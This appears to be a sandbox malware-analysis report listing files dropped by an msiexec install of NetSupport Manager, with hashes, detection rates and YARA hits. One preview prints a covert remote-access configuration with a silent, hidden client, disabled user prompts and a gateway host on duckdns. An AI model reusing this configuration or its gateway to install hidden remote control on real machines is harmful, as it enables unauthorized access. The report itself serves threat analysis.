                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):836
                                                                                      Entropy (8bit):5.502925006660024
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:nBhzEPmPT8FVXR8piBlnxOo31fXXfD+2ijr6cgEW3ZxAhU6L:nBtuK+VXypGlnxJ31fHfqj+cg3ZG
                                                                                      MD5:165A65E2FDE1870C85C463D021600B62
                                                                                      SHA1:16D38EAE2E83F532AF04117CEFF0D1DA80695076
                                                                                      SHA-256:8EF0F3A5FE3C2338E27BEFAAB18823135E22DA3462651FDA832D4C513F082BC6
                                                                                      SHA-512:8B7507AD5E91377FC50673C649B8FA26245504AF53200AFBE56130B67C05318E707CC642FF0A54771DEFD5AC87252684AB5245099C7CE2AA81F0C52B55A48D7D
                                                                                      Malicious:false
                                                                                      Preview:0xf10b75ab....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..UsernamesU=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..PasswordU=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSKU=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250160
                                                                                      Entropy (8bit):6.6978319974134735
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:7tOrNG33aoeoMgFrxCCTZkogkArqfmUQr3fGkfJFCIZJ12z/bRbH:7tOrO3Ksko5Arq23AIZKzx
                                                                                      MD5:E5F65F0775313A0C23B3C61916C2C3EF
                                                                                      SHA1:CF84F9C9DF08D389C07C3E51EFDF7714D188BDFE
                                                                                      SHA-256:AF557540224984F759068120590A8178AB50406BCAE8812351B56B274BC6D4F5
                                                                                      SHA-512:15F9B9AEB40622EE9D6AD19CA17B1F1A1666BF8F33DC9A604E22F7550F4CA9BC7B0DD2AA6AF24E6EF534CCAC007E923C6CFF2507F7357489F5ADCA369D782B06
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):2381
                                                                                      Entropy (8bit):5.374632099663492
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:E4hfow3Kqy0nxNrwN1XQmeFh+5XXdJpBsK38pwlFTP/Fs0cv:EBwG0xNrwN+qD3MpwlFL2tv
                                                                                      MD5:703C7774B981E5D02E058340A27A5B75
                                                                                      SHA1:37534D7F0B31D2328D70CA578047D597273B73B6
                                                                                      SHA-256:4CFCA868959F4E1B85BFD6B8A970AE06C0810D9C341F260DF3AB8479089500E9
                                                                                      SHA-512:758E84915FA7EBB343BAFD096BC40D9D226FE0DA7C167B2B8E59F664E1BE796143228BC3405DF7E3447CDC918004DB516344365D3D07A8E6C040DF2B90456D78
                                                                                      Malicious:false
                                                                                      Preview:; gdihook5.inf..; Installation inf for the gdihook5 mirror driver...; copyright (c) 2011 NetSupport Ltd....[Version]..Signature="$WINDOWS NT$"..Provider=%PCI%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=08/14/2011,11.11.0.704..CatalogFile=gdihook5.cat....[DestinationDirs]..DefaultDestDir = 11..gdihook5.Miniport = 12 ; drivers..gdihook5.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%PCI% = gdihook5.Mfg, NTx86, NTamd64....[gdihook5.Mfg.NTx86]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....[gdihook5.Mfg.NTamd64]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....;..; General installation section..;....[gdihook5]..FeatureScore=FC..CopyFiles=gdihook5.Miniport, gdihook5.Display....;..; File sections..;....[gdihook5.Miniport]..gdihook5.sys....[gdihook5.Display]..gdihook5.dll......;..; Service Installation..;....[gdihook5.Services]..AddService = gdihook5, 0x00000002, gdihook5_Service_Inst....[gdihook5_Service_Inst]
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8991
                                                                                      Entropy (8bit):6.951682034433646
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:iEd0VE3v3k08ywwlhjeyveCtAW5LfsxhQ8eVC:iDwPjpvjAGLa3x
                                                                                      MD5:2D31CE5FE7CD81C996615EBCC29C058A
                                                                                      SHA1:4D74FE8E3170D36666DF779E43FE8016986B154A
                                                                                      SHA-256:019290C9B7E5B48FB6DE95F9563ED481CD42F8658451C6FBC8AD131D61209CE0
                                                                                      SHA-512:B8188481050630E7317D2F0687790A46E86F30A79F34164E4B02EC28DA39334DA80BD494A4F32AE8BB60FA2F01273CDCD9D15100F901517B0C01507678330052
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):59872
                                                                                      Entropy (8bit):6.890148857867
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:YKLLK1jLIrJUw9Dyehz6mnTEDtGCd3FN+r2pe/q3HDHf/ckBr2pe/NyHDHf/ckt:YKLLKS9Dvhu5NOee/ajHxee/UjHR
                                                                                      MD5:7AC62F00194B01935EA6A35CF8884912
                                                                                      SHA1:7A04936B6C234AA924AD3293188A39B3CC49AD3A
                                                                                      SHA-256:5B87FAFB20833B4803F829C6816235048566579F6C72EF44B6FDE1F54195384F
                                                                                      SHA-512:86A98BF85142DFF3F6643B964579D2AC2438BE9A3D644E2C0E1BD3FF055C0CE17ACFC689503AB0A9AFB4E495B406592597F613F47C12E8E2413F6AA89E0B5FD7
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2578344
                                                                                      Entropy (8bit):6.251948534749446
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:4X0hD1wHH5cvdcSvrIq8hJ1CPwDv3uFh+OfXXU:4X0hD1w21csIq831CPwDv3uFh+j
                                                                                      MD5:8A04281ABC13FE1D4C8587AE9D177C42
                                                                                      SHA1:72C2FCB96404C32C8BD8D1B2752B0B24CE9AB539
                                                                                      SHA-256:DD697C680C7296FE84F8761C54D7DAEED41222E86D409A4751F5A53B16A82B0B
                                                                                      SHA-512:DD13813A32C1561115C1B61B50F56B560A1C2BF27F061A9E7B328937DC896150B4C31AC57BFEA475DA8ED08996F708C8724B9D50FC2DC2D59EAF25CACE32D112
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):555944
                                                                                      Entropy (8bit):5.860497620903766
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:aVM2qk4ikDJj2hZuF/fpGzBqGPeck8p22gU2lvzaP1r4:X2q7ikLXg+c7wU2lvzaPi
                                                                                      MD5:D559D1B694B817E3E3E15200AF4603F6
                                                                                      SHA1:4D486E5D8171973C17E61ACA47FC97A71BC9EB7E
                                                                                      SHA-256:407C28909CEA2ADC3B2B2A1F89132A543F57EFF9D96CDAA5DEEF5109CB2CA770
                                                                                      SHA-512:6480B2F66558BDB5D0243E66AECD4E9B347BC5A67B829AE1980043AC487290B8CF04C43F3294E4160B5CA4F604D1C17000458EEBF759A530C5B79E2A952A72BB
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 300 x 77, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):6843
                                                                                      Entropy (8bit):7.939767423234445
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:YSH/KoQ1X5F8VX3JNHimWaMp3Lu0FEkxpGAlNjGJHpLgwDy+eFyb:fyl/aVXK7u09JNoJ0wDy+C+
                                                                                      MD5:9A9827C570F102CA3366E549A047B99A
                                                                                      SHA1:682C7A3612B300B1F3D0B5E0BE557ED148003DE0
                                                                                      SHA-256:F1F79307A3352EFB6CE296EED242F368C4724144B7B2F624C1B4223C7952A2C9
                                                                                      SHA-512:8BBFA11F841276A07E29E8D042FD4436C569BA984A56F6EB45D9D73A65BE7EBFECF8D8BC81D122FCF9DE4814A41EF38E7150EFAA8D06C0BE0145B74712D5E834
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4397384
                                                                                      Entropy (8bit):7.044443988235452
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:WEWsrhmswShHpSvnB5MnhpTnWbWA7ySeAfCt0PfI9jWwg76YAvvU+uFLOAkGkzdz:W6DWbLRojDbvU+uFLOyomFHKnPA25
                                                                                      MD5:493FC0F59054A6F4F3775655FB55295C
                                                                                      SHA1:2AFE4F5EB626FB5C5AA5BB6C2BC61C88E37CF42F
                                                                                      SHA-256:CAC58C98F7E587BA1B2A4F41874764B59BDF6CB684A4A44AEE93F91B3B9A019B
                                                                                      SHA-512:9DA41078A65A6B8C731388CCF4CE2A988705305F29F0841039B96CD2649F82E8EA219F082DE184826E39F0EDAA4A1D9AFF2E60EBB8D27771222D0C7CB165598D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4422992
                                                                                      Entropy (8bit):7.012472770624414
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:jsWbb5oF0MUVVsK3vOGH+1TSlUE7vrffTTnm7ulf67NACOub7FLOAkGkzdnEVomK:jx5x3Ii6F7FLOyomFHKnPA+
                                                                                      MD5:F32077DF74EFD435A1DCDF415E189DF1
                                                                                      SHA1:2771393D56FF167275BF03170377C43C28EE14E1
                                                                                      SHA-256:24BB6838DEFD491DF5460A88BED2D70B903A2156C49FB63E214E2C77251ECA71
                                                                                      SHA-512:FB708E0949854998FB80635138C80AC05D77DCA3089D3E5974663DDF2376D6A03535DAE1A068514C3B58BC06C8E4078B37CFB6BC90F080F7F31FEFC972A34850
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5178656
                                                                                      Entropy (8bit):6.880627623004376
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:DEl4oAxkdYqhHRMg7R/dRwIc/3jYkCw055xXtQo7h6jBPgUYcupFLOAkGkzdnEVM:DlEdLhxM+/TwIc/j65x9aZgUYcaFLOyM
                                                                                      MD5:835F7A6C55D49EAE72A482D781B1EAD8
                                                                                      SHA1:CC63546F46E0BDA33EFFF2CDA121219667EB70E3
                                                                                      SHA-256:A52B83AC23739BCC8B0E89D1EFC05A199FE7CF8914D3F42C8DB5560CADB105E7
                                                                                      SHA-512:F0F0B36502AB2E3283ACD87171E0F7FE823515A4DCE7C70079AB26D3F75096E9A05EA6E0377E50ACF21B491AFE404DABFFBD0D91D6421C0B337CB3C6CE72CB24
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):421200
                                                                                      Entropy (8bit):6.595942471932211
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:Seb8zxr1aWPaHX7dGP5frhUgiW6QR7t5qv3Ooc8UHkC2e7wx:Seb8Fpa6aHX7dGP5Gv3Ooc8UHkC2ekx
                                                                                      MD5:BC83108B18756547013ED443B8CDB31B
                                                                                      SHA1:79BCAAD3714433E01C7F153B05B781F8D7CB318D
                                                                                      SHA-256:B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671
                                                                                      SHA-512:6E72B2D40E47567B3E506BE474DAFA7CACD0B53CD2C2D160C3B5384F2F461FC91BB5FDB614A351F628D4E516B3BBDABC2CC6D4CB4710970146D2938A687DD011
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):462120
                                                                                      Entropy (8bit):6.664460200008014
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:U3QUergtVD7jfIobCFvUk5ShUgiW6QR7t5s03Ooc8dHkC2esIj:9UXzD3IoCFvUG03Ooc8dHkC2eJj
                                                                                      MD5:11BC8B95833B52E09DAC5EC36F09C125
                                                                                      SHA1:8ED0EA8ACB742F084816261E7CD5AAB5B98E22BE
                                                                                      SHA-256:32882ABB46333874F3DD9B3648CEA6DE18D75D04863C2CD2F1BCDDBF348E3A26
                                                                                      SHA-512:0FE24A5C910CCA7FD1BDB7D5988FE8ABC210A859D42AA0234D969F0911207E50D48AF244B0A2E86E0A66A3FFE981E5F48E2DD72A8D62FD1B53FD4B9ED531658E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):773968
                                                                                      Entropy (8bit):6.901559811406837
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):4.93007757242403
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                      Malicious:false
                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33408
                                                                                      Entropy (8bit):6.382369861010622
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                      MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                      SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                      SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                      SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34008
                                                                                      Entropy (8bit):6.39207103344199
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                      MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                      SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                      SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                      SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):1205074
                                                                                      Entropy (8bit):7.972382983591089
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:JjcLsXXg/ijPaKIpt42tePKWs0u0jippHik509oh96IWIXqdgFbpcLnuTAOkvlI8:JjcLsXXg/ijPaKIpt42tePKWs0u0j8p0
                                                                                      MD5:6F293EC153DACA9796FD1E9C9C2B095E
                                                                                      SHA1:C9B280CDD81931D2CD95102FA04B96BA42F02E06
                                                                                      SHA-256:344DC9D97915EC8E4215A866F92E0BC4A50252B25534AD403105E00A750346FF
                                                                                      SHA-512:1BBCC4C4732ADEE87CA0092104741015D8AB8A9E5D21E6F805AE05BEC4A0F2889DBE12A9A28580EE5E1EE903F7FD42BC1CB750658F07D7408B60A19AA718439A
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):57824
                                                                                      Entropy (8bit):6.862108284538071
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:lF4WcduX42gXhBksgUHVEDqAnIocwl1kkr2pe/NPHDHf/ckXr2pe/eJHDHf/cky:lF4DduX4lBnzyiwYkee/VjHPee/MjHu
                                                                                      MD5:59C2F14F34522E03B127851AD682FE5A
                                                                                      SHA1:AA6204D13BEC0D33D7B3BE1043222D3367AB110F
                                                                                      SHA-256:01DF4E94F6C64CE675F3E809889E3F4FA2182B9D5411A9584F239577C3FE8F20
                                                                                      SHA-512:98949C4C649F45DD3BDDED2DCFE19D2DB45F33CE2B9E0170A8A23C74B8D5746FF17EDD33D372F491F58F13913CF9C67545144B4235C2EC168832D321EDD3AC38
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):8177120
                                                                                      Entropy (8bit):5.048395174836045
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:aU4gcDUXCYllmuLc3Klq/Uq+PujPh6415zi:argcQj9c31f+PujU415+
                                                                                      MD5:E85AF106BEDAF5E96E5633537ED29D8C
                                                                                      SHA1:CD4E38AC92374C94CCBDE982613439788EFCB7DA
                                                                                      SHA-256:3B8CCEB2A7049E2B1288E35C1469D8E2B510E844292B96F8C86108B53448C6A8
                                                                                      SHA-512:1763A02C49FF03EA3581795636DD73C5105659685112B57A1FC9D92E60A1B0748C584F1FD1F27CBBC126ED2A72CE9C2C5332EF430604C33D6DF3099BAEA6D82E
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):96736
                                                                                      Entropy (8bit):6.808355354530158
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:zMc3pwImQbF54NpbfukIEpOBfh76ORM7Cx1Iiee/bjHxR9ee/rjHJ:zMc3ppv4rbfu1cEV6ORM7CteqjteOjp
                                                                                      MD5:3C616AB2D7A5AC710E57CABCEB819CFA
                                                                                      SHA1:F447BFDB8D2C1220E73BA4E55E6752F224CFCC09
                                                                                      SHA-256:D39A4722318A7AA4782CB6837BE8989C24224B47A58AD8C639CF4C12FC97915A
                                                                                      SHA-512:B4E7C99CB41E4D7FE16B93192596E849B0E9F4749F4D1C0E7C552CE61B231BFBBD3A0B8DD8030938A069485035D0392339BEA157657BE6FCFF09B09021DBF9A5
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9221
                                                                                      Entropy (8bit):7.232259392017478
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:K/GHRiwQnYe+PjP1rhr7+vgwKjtlAur9ZCspE+TMAr4zTh:WnYPL/rPUHeMtzN
                                                                                      MD5:E30476931A500CBB1316218170DB3FDD
                                                                                      SHA1:40E8A0BEB0E6C9B5C1037D01E921418B47828C90
                                                                                      SHA-256:3DE96F95811CF5FAF09A1909CADD7637B9B19E07FCB320AAD6EB4A187F67FE47
                                                                                      SHA-512:7E2132B5CCE530D74F2694D491733AD1B5E43E37112EB5D7587862955C7C83EAA46C128D35BDA35F382D0455F809CDA23CCBCDC6F6618DAFB9FB3DF191EBEE65
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):2930
                                                                                      Entropy (8bit):5.396768235621853
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:a0xFYjOMpjOOsLGjXivDAaUntuQwuHkvFuDf+nLE7ScxbnbCNTBfoNRS2KUKFN5K:aYmtjOOsGjXivDAaUntJ3Df+LeSUEeyW
                                                                                      MD5:78B6B809D8ABCCB9FA9BF540B7CCD363
                                                                                      SHA1:2D0BFD6DA3A14AA7E2B7B9BF0551A49D7665CE30
                                                                                      SHA-256:ACFB0123F62A8A4740361F77B9D34AA6481B2AA30153F56ED866F84507D69E0C
                                                                                      SHA-512:E16A728840724FD3B8E6DF3A1B0F476D66F54F0D1A795AAB2928ECD739E1B8D6B716882D5E4F5FBCD8BB2ED7EB6B7B279198938AC7E70D130D6A0B9404FD6200
                                                                                      Malicious:false
                                                                                      Preview:; NSPSCR.INF..; Copyright (c) 2008-2014 Net Support Limited....[Version]..DriverVer=05/22/2014,12.01..CatalogFile=nspscr.cat..Signature="$Windows NT$"..Class=SmartCardReader..ClassGuid={50DD5230-BA8A-11D1-BF5D-0000F805F530}..;Class = LegacyDriver..;ClassGuid = {8ecc055d-047f-11d1-a537-0000f8753ed1}..Provider=%MFG%....[ControlFlags]..; Prevent legacy install for PnP readers..ExcludeFromSelect=Root\NS-PseudoSmartCardReader....[Manufacturer]..%MFG%=NSL, NTAMD64....; ============ Add reg for all readers ===============....[Reader.Install.AddReg]..HKLM, Software\Microsoft\Cryptography\Calais\Readers,,,..HKLM, System\CurrentControlSet\Services\SCardSvr,Start,0x00010001,2..HKLM, System\CurrentControlSet\Services\CertPropSvc,Start,0x00010001,2....; ================= NSL readers =====================....[NSL.NTAMD64]..; DisplayName Section DeviceId..; ----------- ------- --------..%MFG.DeviceDesc% = PSCR.Install, Root\NS-PseudoSmartCardReader....[PSCR.Inst
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):27272
                                                                                      Entropy (8bit):6.237518432862503
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:aI2iS+JdAYLZCgM11FZgx4rbnjfpe0mSoXot5RJVO8WCT74Td2aQnYPL/rKeMPPW:a9BqdtbOjpe3TXobRJVki7cTQS
                                                                                      MD5:F56457F0C75E3D9B82C88B425CB5C95B
                                                                                      SHA1:4F6BE0D0CCDAAEEC42F5F45071C6063E00AE3EE4
                                                                                      SHA-256:6DA36B43A75611476B0ABBD4F2E81FC455B694306C9500F54DD2524985FF0E1A
                                                                                      SHA-512:635B72AF34E1E6B63C7CE659DF2B9A73EB537AB9127A3ABF920188C5F3CDF571DB3942282CED0BBAD8DB28D6DDA73C6623280250B886D2DA4D43A86884DB9F41
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):16632288
                                                                                      Entropy (8bit):4.729694563429236
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:Ig23l4a23kKnTtFXg+/nkeA3jiDz6Ic6MWlNkJ1uxsh7ncWHrwGra:Ck3RnTnXgcGjiilQ3mn5n1rwf
                                                                                      MD5:AC850065D5807949D987F1E00F34DFF3
                                                                                      SHA1:4E3C564046BD4F655A958F299D6DB9198FB99FF8
                                                                                      SHA-256:D0BE908B5B2149896D5F6E28C2E3D0735ABC7B200EB88C7ECFA1974618417B77
                                                                                      SHA-512:630EEA09F442EA382AC142A2BE6CE3D82E25ED88CA87873B9D6E0E4D5902C7D134486A1ECAD50089C74FFECD1E5696F080345C3EFBCEFF9C818CF653FE0ABDD5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):49632
                                                                                      Entropy (8bit):7.033464466519071
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:3hGznfNnu0sbqmuebcTYCBU1wn+Pam8Arr2pe/PZDRHDHf/ckWOir2pe/ssHDHfm:3hGzfFDmmTYCtMawee/njHVyee/zjHe
                                                                                      MD5:97AF6CC2109C3195ECF019C4E988079D
                                                                                      SHA1:2B1A0ED3FA7C15D77A8C08FCA4CBB503CBBFAB0F
                                                                                      SHA-256:F02F921D5C52EF1D56585AC571A42502B62F571D02E80B88C99BF74C8F390733
                                                                                      SHA-512:085D7D1F65EAF18064FEE84AD4FB1F173922F1E8C60E058274CB70D28D242A9E25415C7E204313517425A736B7A534C7D6592B8B1F1F5B312E4CCFD0471465D1
                                                                                      Malicious:true
